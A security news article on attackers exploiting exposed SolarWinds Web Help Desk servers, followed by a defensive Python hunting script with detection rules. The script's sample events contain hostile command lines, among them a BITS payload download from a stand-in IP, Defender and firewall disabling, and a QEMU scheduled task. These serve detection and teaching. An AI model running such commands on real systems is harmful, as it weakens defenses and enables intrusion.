Tuesday, February 10, 2026


Hackers exploit SolarWinds Web Help Desk to breach enterprise networks

Internet-exposed SolarWinds Web Help Desk (WHD) servers were the entry point for a multi-stage intrusion campaign observed by Microsoft security researchers. The activity began with the exploitation of those exposed WHD instances and continued with lateral movement across the victims' networks toward high-value assets.

According to the Microsoft Defender Security Research Team, the WHD instances were exploited to achieve unauthenticated remote code execution. Investigators said it remains unclear which vulnerability was used, because the affected servers were exposed to both older and newly disclosed flaws at the same time: CVE-2025-40551 (CVSS 9.8), CVE-2025-40536 (CVSS 8.1) and the previously patched CVE-2025-26399 (CVSS 9.8). “Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold,” Microsoft said. The practical consequence is that checking a server for a single CVE is not enough: a WHD deployment should be on a release that closes all three, and any instance that sat internet-exposed while unpatched should be reviewed for the post-exploitation activity described below rather than assumed clean.

After compromising WHD, the attackers executed arbitrary commands in the context of the application. “Upon successful exploitation, the compromised service of a WHD instance spawned PowerShell to leverage BITS for payload download and execution,” researchers said. The post-exploitation chain relied largely on legitimate tooling: the attackers deployed Zoho ManageEngine tools to maintain access, enumerated sensitive domain users including members of Domain Admins, established persistence through reverse SSH and RDP, attempted to run a QEMU virtual machine under the SYSTEM account, abused DLL side-loading via wab.exe to steal credentials and, in at least one case, carried out a DCSync attack to replicate credential data out of Active Directory. The US Cybersecurity and Infrastructure Security Agency (CISA) later added CVE-2025-40551 to its Known Exploited Vulnerabilities catalog and ordered federal agencies to apply patches by February 6, 2026.

SolarWinds Web Help Desk activity was also referenced in a February 8, 2026 update from cybersecurity firm Huntress, which detailed a similar incident from February 7, 2026. In that case the attackers deployed Zoho Assist, Velociraptor version 0.73.4 and Cloudflare tunnels for persistence and command and control (all legitimate remote-support, forensics or networking tools, which is why a product-based blocklist alone will not catch them), disabled Windows Defender and the Windows Firewall, collected system data and created scheduled tasks that launched QEMU. Huntress said the infrastructure matched earlier SolarWinds-related intrusions. Microsoft warned, “This activity reflects a common but high impact pattern,” and urged organizations to prioritize patching, remove unauthorized tools, rotate the credentials of affected accounts and strengthen monitoring across their systems.
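The post-exploitation chain described in the Microsoft and Huntress paragraphs above maps onto a small set of telemetry checks. The following is an added example written for this page, not code from the article, Microsoft or Huntress: it runs simple hunting rules over constructed Sysmon-style process-creation events and a Security event 4662 record. The WHD parent-process pattern (a bundled Java/Tomcat service), the directories treated as legitimate for wab.exe, the sample command lines, the hostnames and the event field names are all assumptions; the replication extended-right GUIDs are the documented Active Directory values.

```python
import re

# Extended-right GUIDs for directory replication (documented Active Directory schema values).
REPLICATION_RIGHTS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
)
# Assumption: WHD runs under a bundled Java/Tomcat service, so that is the parent to watch.
WHD_PARENT = re.compile(r"\\(java|javaw|tomcat\d*)\.exe$", re.IGNORECASE)
BITS_USE = re.compile(r"start-bitstransfer|bitsadmin(\.exe)?\s+/transfer", re.IGNORECASE)
DEFENSE_TAMPER = re.compile(
    r"set-mppreference\s+-disablerealtimemonitoring\s+\$?true|advfirewall\s+set\s+\w+\s+state\s+off",
    re.IGNORECASE,
)
# Assumption: the only directories a genuine wab.exe should run from.
WAB_LEGIT_DIRS = ("c:\\program files\\windows mail\\", "c:\\program files\\common files\\system\\")
SYSTEM_ACCOUNTS = {"nt authority\\system"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """Return the rule names one Sysmon-style process-creation event trips."""
    hits = []
    image, name = ev["image"].lower(), _basename(ev["image"])
    parent, cmd = ev.get("parent_image", "").lower(), ev.get("command_line", "")
    user = ev.get("user", "").lower()
    if name == "powershell.exe" and WHD_PARENT.search(parent):
        hits.append("whd_spawned_powershell")      # WHD service spawning PowerShell
    if name in ("powershell.exe", "bitsadmin.exe") and BITS_USE.search(cmd):
        hits.append("bits_payload_download")       # BITS used to fetch a payload
    if name == "wab.exe" and not image.startswith(WAB_LEGIT_DIRS):
        hits.append("wab_sideload_path")           # wab.exe copied elsewhere for DLL side-loading
    if name.startswith("qemu") and user in SYSTEM_ACCOUNTS:
        hits.append("qemu_as_system")              # hypervisor launched as SYSTEM
    if name == "schtasks.exe" and "qemu" in cmd.lower():
        hits.append("scheduled_task_qemu")         # persistence via a scheduled task running QEMU
    if DEFENSE_TAMPER.search(cmd):
        hits.append("defender_or_firewall_disabled")
    if name == "cloudflared.exe" and "tunnel" in cmd.lower():
        hits.append("cloudflared_tunnel")          # Cloudflare tunnel used for C2
    return hits


def check_directory_access(ev):
    """Flag Security event 4662 where a non-machine account exercised replication rights (DCSync)."""
    props = ev.get("properties", "").lower()
    subject = ev.get("subject_user", "").lower()
    if any(g in props for g in REPLICATION_RIGHTS) and not subject.endswith("$"):
        return ["dcsync_replication_by_user"]
    return []


def hunt(events):
    """Run every rule over a list of events and return {rule_name: [event ids]}."""
    findings = {}
    for ev in events:
        hits = check_directory_access(ev) if ev.get("event_id") == 4662 else check_process(ev)
        for h in hits:
            findings.setdefault(h, []).append(ev["id"])
    return findings


# Constructed sample telemetry (not real incident data); ids 1-8 are malicious, 9 and 10 are benign.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    {"id": 1, "event_id": 1, "image": PS, "parent_image": r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe",
     "command_line": "powershell -nop -w hidden -c Start-BitsTransfer -Source http://203.0.113.10/p.bin -Destination C:\\Windows\\Temp\\p.bin",
     "user": "NT AUTHORITY\\SYSTEM"},
    {"id": 2, "event_id": 1, "image": r"C:\Users\Public\wab.exe", "parent_image": CMD,
     "command_line": "wab.exe", "user": "CORP\\svc-whd"},
    {"id": 3, "event_id": 1, "image": r"C:\ProgramData\q\qemu-system-x86_64.exe", "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": "qemu-system-x86_64.exe -m 512 -drive file=disk.qcow2", "user": "NT AUTHORITY\\SYSTEM"},
    {"id": 4, "event_id": 1, "image": r"C:\Windows\System32\schtasks.exe", "parent_image": CMD,
     "command_line": 'schtasks /create /tn Updater /tr "C:\\ProgramData\\q\\qemu-system-x86_64.exe -m 512" /sc onstart /ru SYSTEM',
     "user": "CORP\\svc-whd"},
    {"id": 5, "event_id": 1, "image": PS, "parent_image": CMD,
     "command_line": "powershell -c Set-MpPreference -DisableRealtimeMonitoring $true", "user": "NT AUTHORITY\\SYSTEM"},
    {"id": 6, "event_id": 1, "image": r"C:\Windows\System32\netsh.exe", "parent_image": CMD,
     "command_line": "netsh advfirewall set allprofiles state off", "user": "NT AUTHORITY\\SYSTEM"},
    {"id": 7, "event_id": 1, "image": r"C:\ProgramData\cf\cloudflared.exe", "parent_image": CMD,
     "command_line": "cloudflared.exe tunnel run --token eyJ...", "user": "NT AUTHORITY\\SYSTEM"},
    {"id": 8, "event_id": 4662, "subject_user": "CORP\\jdoe", "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 9, "event_id": 4662, "subject_user": "CORP\\DC02$", "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 10, "event_id": 1, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -c Get-Service", "user": "CORP\\jdoe"},
]

if __name__ == "__main__":
    for rule, ids in sorted(hunt(SAMPLE_EVENTS).items()):
        print(f"{rule:32} events {ids}")
```

To use this against real data, map your EDR or Sysmon fields into the same dictionary shape and feed the records to `hunt`. The DCSync rule deliberately excludes machine accounts (trailing `$`) because domain controllers replicate with each other legitimately; any service account that also holds replication rights, such as the one used by Microsoft Entra Connect, must be added to an allowlist or it will be flagged on every sync cycle.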
